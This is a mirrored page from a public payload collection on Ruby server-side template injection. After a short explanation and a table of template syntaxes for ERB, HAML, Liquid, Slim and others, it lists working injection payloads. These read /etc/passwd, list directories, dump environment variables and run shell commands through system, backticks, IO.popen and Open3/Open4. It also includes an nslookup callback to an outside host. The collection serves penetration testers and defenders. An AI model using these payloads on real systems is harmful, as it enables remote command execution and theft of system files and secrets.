mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
2.0 KiB
2.0 KiB
Server Side Template Injection - Ruby
Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation.
Summary
Templating Libraries
Template Name | Payload Format |
---|---|
Erb | <%= %> |
Erubi | <%= %> |
Erubis | <%= %> |
HAML | #{ } |
Liquid | {{ }} |
Mustache | {{ }} |
Slim | #{ } |
Ruby
Ruby - Basic injections
ERB:
<%= 7 * 7 %>
Slim:
#{ 7 * 7 }
Ruby - Retrieve /etc/passwd
<%= File.open('/etc/passwd').read %>
Ruby - List files and directories
<%= Dir.entries('/') %>
Ruby - Remote Command execution
Execute code using SSTI for Erb,Erubi,Erubis engine.
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
Execute code using SSTI for Slim engine.
#{ %x|env| }